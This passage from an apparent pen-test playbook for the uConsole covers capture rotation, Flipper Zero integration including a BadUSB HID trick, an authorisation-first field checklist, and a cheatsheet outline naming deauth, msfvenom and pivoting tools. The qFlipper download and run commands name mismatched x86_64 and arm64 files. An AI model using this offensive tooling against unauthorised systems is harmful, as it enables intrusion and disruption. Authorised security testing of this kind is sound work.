Useful for: long stakeouts where you want SSH access to the uConsole while it captures.

12.3 Battery management for long ops

A stock uConsole runs ~3-4 hours under typical pen-test load. Strategies for longer:

External USB-C power bank (10000-20000 mAh): plug-and-go; doesn’t replace battery, supplements it. ~$30-60.
Higher-capacity 18650 cells: 3500 mAh Panasonic NCR18650GA replaces stock 3000 mAh; ~17% more runtime.
Power-saving config: disable Bluetooth (not used during most pen-test work), set CPU governor to powersave during idle, dim screen.
Cron-driven shutdowns: schedule systemctl suspend after N minutes idle, wake via WAKE# GPIO.

For an overnight Kismet survey, the USB-C power bank is the right answer.

12.4 Storage strategy — capture rotation

PCAPs grow fast. A 24-hour Kismet capture on a busy WiFi environment is 5-10 GB. Strategy:

eMMC for OS and tooling. Fast random I/O for tool databases.
USB-C SSD for captures. 256-512 GB; fast sequential writes.
Rotation script that compresses + uploads completed captures to your workstation:

#!/bin/bash
# /usr/local/bin/rotate-captures.sh
SRC=/mnt/usbssd/captures
DEST=workstation:/srv/pentest-captures/$(hostname)
find "$SRC" -name "*.cap" -mmin +60 -exec gzip {} \;
rsync -av --remove-source-files "$SRC"/*.gz "$DEST"/

Run via systemd timer hourly.

13. qFlipper and Flipper Zero Integration

The Flipper Zero pairs naturally with the uConsole. Talking Sasquach calls this combo “an absolutely great project.”¹

13.1 Why this combo

The Flipper Zero is good at: sub-GHz RF (315/433/868/915 MHz), NFC, RFID (125 kHz LF + 13.56 MHz HF), IR, BadUSB attacks.
The uConsole is good at: WiFi audit, network scan, web app, post-exploit.
Together: a pocket pentest kit covering most of what a security-research engagement needs without a laptop.

13.2 Installing qFlipper on the uConsole

qFlipper is the official desktop client for managing the Flipper Zero — file management, firmware updates, log retrieval, app catalog browse-and-install.

# qFlipper packaged AppImage (the official distribution):
wget https://update.flipperzero.one/builds/qFlipper/1.3.3/qFlipper-x86_64-1.3.3.AppImage
# (Note: Flipper team has built ARM64 AppImage builds since 2024 — verify current release)

chmod +x qFlipper-arm64-1.3.3.AppImage
./qFlipper-arm64-1.3.3.AppImage

Connect Flipper to USB-A. qFlipper detects it; you can browse Flipper’s storage, install apps from the catalog, push custom firmware.

13.3 Flipper HTTP

Flipper HTTP is a Flipper firmware app that lets the Flipper interact with HTTP services — useful as a sensor / actuator / network beacon for the uConsole’s pen-test workflow.

Pattern: Flipper detects an event (RFID scan, sub-GHz signal, button press) → sends HTTP webhook to the uConsole → uConsole reacts (logs, alerts via cellular, runs follow-up scan).

13.4 Mouse-jiggler and other utility apps

Tangential but useful — the Flipper’s mouse-jiggler app keeps a paired computer awake during long sessions. Plug Flipper into a target machine via BadUSB; the Flipper presents as a HID mouse and gently moves the cursor every N seconds. Common during pen-test workshops or when waiting on long-running tasks.

14. The Field-Pen-test Loadout Checklist

Pre-engagement checklist:

[ ] Authorisation in writing — SoW or RoE document, signed
[ ] Scope confirmed — IP ranges, hostnames, time window
[ ] Out-of-scope explicitly noted

Hardware:
[ ] uConsole, batteries charged
[ ] USB-C charger + USB-C cable
[ ] USB-C power bank (10000+ mAh)
[ ] USB Alfa AWUS036ACH (5 GHz monitor mode)
[ ] USB-C SSD (256+ GB) for capture rotation
[ ] LTE-modem-equipped Mini PCIe slot (with active SIM)
[ ] Spare 18650 cells (charged)
[ ] Optional: Flipper Zero
[ ] Optional: USB-Ethernet adapter
[ ] Antenna kit if AIO V2 in use

Software pre-flight:
[ ] OS up-to-date (apt update / apt full-upgrade)
[ ] Kali metapackages installed (kali-tools-wireless / -information-gathering / -web / -passwords / -exploitation as relevant to engagement)
[ ] Wordlists synced from workstation (custom + rockyou + cewl-derived)
[ ] Burp / ZAP CA cert installed in browser
[ ] SSH key for workstation tunnel
[ ] WireGuard config for out-of-band access
[ ] Time set correctly (chrony) — important for log correlation

Project structure:
[ ] ~/projects/pentest/<engagement>/
[ ] ~/projects/pentest/<engagement>/captures/
[ ] ~/projects/pentest/<engagement>/scans/
[ ] ~/projects/pentest/<engagement>/loot/
[ ] ~/projects/pentest/<engagement>/notes.md (engagement log)
[ ] ~/projects/pentest/<engagement>/report.md (running findings)

On-site:
[ ] Verify out-of-band uplink works (LTE)
[ ] Verify NTP clock in sync
[ ] Confirm scope by re-reading RoE document
[ ] Initial nmap discovery of in-scope range (sanity check)

End-of-day:
[ ] Sync captures to workstation
[ ] Update notes.md
[ ] Charge batteries
[ ] Lock uConsole (LUKS / login session)

15. Vol 12 Cheatsheet Updates

The following one-pagers go into Vol 12:

§5 (Wireless audit): airmon-ng start/stop, airodump-ng capture command, aireplay-ng --deauth syntax, wifite shortcut.
§7 (Network recon): nmap -sV -A, masscan syntax, enum4linux-ng -A.
§9 (Web app): gobuster dir, sqlmap -u --dbs, nikto -h, Burp keyboard shortcuts.
§12 (Metasploit): msfconsole quick recipe, msfvenom payload generators.
§13 (Pivoting): ssh -D 1080, ProxyChains config, pwncat-cs listener.
§15 (Error → fix matrix): “monitor mode won’t enable on 5 GHz” → “use USB Alfa adapter”; “Burp won’t intercept HTTPS” → “install Burp CA in browser”; “Metasploit OOM” → “increase swap or move to CM5/4 GB+”.
§17 (Resources): legal/ethics reminder, cracking-station SSH alias.

16. Resources

Source	URL
Kali Linux	`https://www.kali.org/`
Kali tools index	`https://www.kali.org/tools/`
Aircrack-ng suite	`https://www.aircrack-ng.org/`
Wifite	`https://github.com/derv82/wifite2`
Kismet	`https://www.kismetwireless.net/`
nmap	`https://nmap.org/`
masscan	`https://github.com/robertdavidgraham/masscan`
theHarvester	`https://github.com/laramies/theHarvester`
recon-ng	`https://github.com/lanmaster53/recon-ng`
SecLists wordlists	`https://github.com/danielmiessler/SecLists`
Burp Suite	`https://portswigger.net/burp`
OWASP ZAP	`https://www.zaproxy.org/`
sqlmap	`https://sqlmap.org/`
feroxbuster	`https://github.com/epi052/feroxbuster`
hashcat	`https://hashcat.net/hashcat/`
john the ripper	`https://www.openwall.com/john/`
Metasploit	`https://www.metasploit.com/`
Exploit-DB	`https://www.exploit-db.com/`
pwncat-cs	`https://github.com/calebstewart/pwncat`
bettercap	`https://www.bettercap.org/`
linpeas / winpeas (PEASS-ng)	`https://github.com/peass-ng/PEASS-ng`
weevely	`https://github.com/epinna/weevely3`
autopsy / sleuthkit	`https://www.sleuthkit.org/`
volatility 3	`https://volatilityfoundation.org/`
binwalk	`https://github.com/ReFirmLabs/binwalk`
Flipper Zero	`https://flipperzero.one/`
qFlipper	`https://github.com/flipperdevices/qFlipper`
HaveIBeenPwned password lists	`https://haveibeenpwned.com/Passwords`
Hak5 WiFi Pineapple	`https://shop.hak5.org/products/wifi-pineapple`
Alfa AWUS036ACH	`https://www.alfa.com.tw/`
OWASP testing guide	`https://owasp.org/www-project-web-security-testing-guide/`

17. Footnotes

(Footnotes are listed inline above; this section is a placeholder anchor for the index.)

18. Index

A — aircrack-ng — §4.5. aireplay-ng — §4.4. airmon-ng — §4.2. airodump-ng — §4.3. Alfa AWUS036ACH — §4.1, §12.2. ARP spoof — §9.3. Authorisation — §2. autopsy — §11.1.

B — bettercap — §9.2. Bluetooth audit — §4.8. Burp Suite — §6.1.

C — Capture rotation — §12.4. CYW43455 — §4.1 (cross-ref Vol 6 §3.4). cewl (cross-ref Vol 5) — §7.5.

D — Deauthentication — §4.4. DNS enumeration — §5.6. DPMS (cross-ref Vol 6) — N/A. Dynamic port forwarding — §10.5.

E — empire — §10.2. enum4linux-ng — §5.3. ESD (cross-ref Vol 7) — N/A. ettercap — §9.2. Exploit-DB — §8.2.

F — feroxbuster — §6.3. Field loadout checklist — §14. Flipper Zero — §13. foremost — §11.3. Forensics — §11.

G — gobuster — §6.3. GPU acceleration (lack of) — §7.1.

H — Harvest-and-offload pattern — §3.4, §7.4. Hash type identification — §7.3. hashcat — §7.3. HID attack (BadUSB) — §13.4.

I — IDS evasion (deauth) — §4.4. Initial access — §3.1. Internet scope — §5.

J — john the ripper — §7.2.

K — Kali metapackages (cross-ref Vol 5 §4.3) — §1. Karma rogue AP — §9.4. kismet — §4.7.

L — Latency tradeoffs — §6.6. Legal / ethics — §2. linpeas — §10.1. Loot phase — §3.1. LTE-only loadout — §12.1.

M — masscan — §5.2. Metasploit — §8.1. mimikatz — §10.2. Mobile forensics — §11.4. Monitor mode — §4.1. msfvenom — §8.1.

N — nikto — §6.5. nmap — §5.1.

O — OSINT — §5.4. OWASP ZAP — §6.2.

P — Password cracking — §7. PCAP rotation — §12.4. pwncat-cs — §8.4. Pivoting — §10.4. Post-exploit — §10. ProxyChains — §10.4.

Q — qFlipper — §13.

R — recon-ng — §5.5. Recon phase — §5. Report phase — §3.1. Rogue AP — §9.4. rockyou.txt — §7.5.

S — searchsploit — §8.2. SecLists — §6.3. Six phases — §3.1. sleuthkit — §11.1. SOCKS proxy — §10.4. sqlmap — §6.4. socat — §10.5. SSH pivot — §10.4. Subdomain enumeration — §5.6.

T — tcpdump — §9.1. theHarvester — §5.4.

U — UART / serial console (cross-ref Vol 4) — §3.2. USB Alfa — §4.1, §12.2.

V — volatility — §11.2.

W — wafw00f — §6.5. weevely — §10.3. whatweb — §6.5. wfuzz — §6.3. wifite — §4.6. winpeas — §10.2. wireshark — §9.1. WPA handshake — §4.5.

X, Y — None.

Z — ZAP — §6.2.

From 02-inputs/community_video_transcripts/yt_4vNxTOFThdg_TalkingSasquach.md ~10:55. The Flipper Zero is a popular handheld pen-test device with sub-GHz, NFC, RFID, IR, GPIO, and BadUSB capabilities. ↩

Pen-test / Kali Playbook

Contents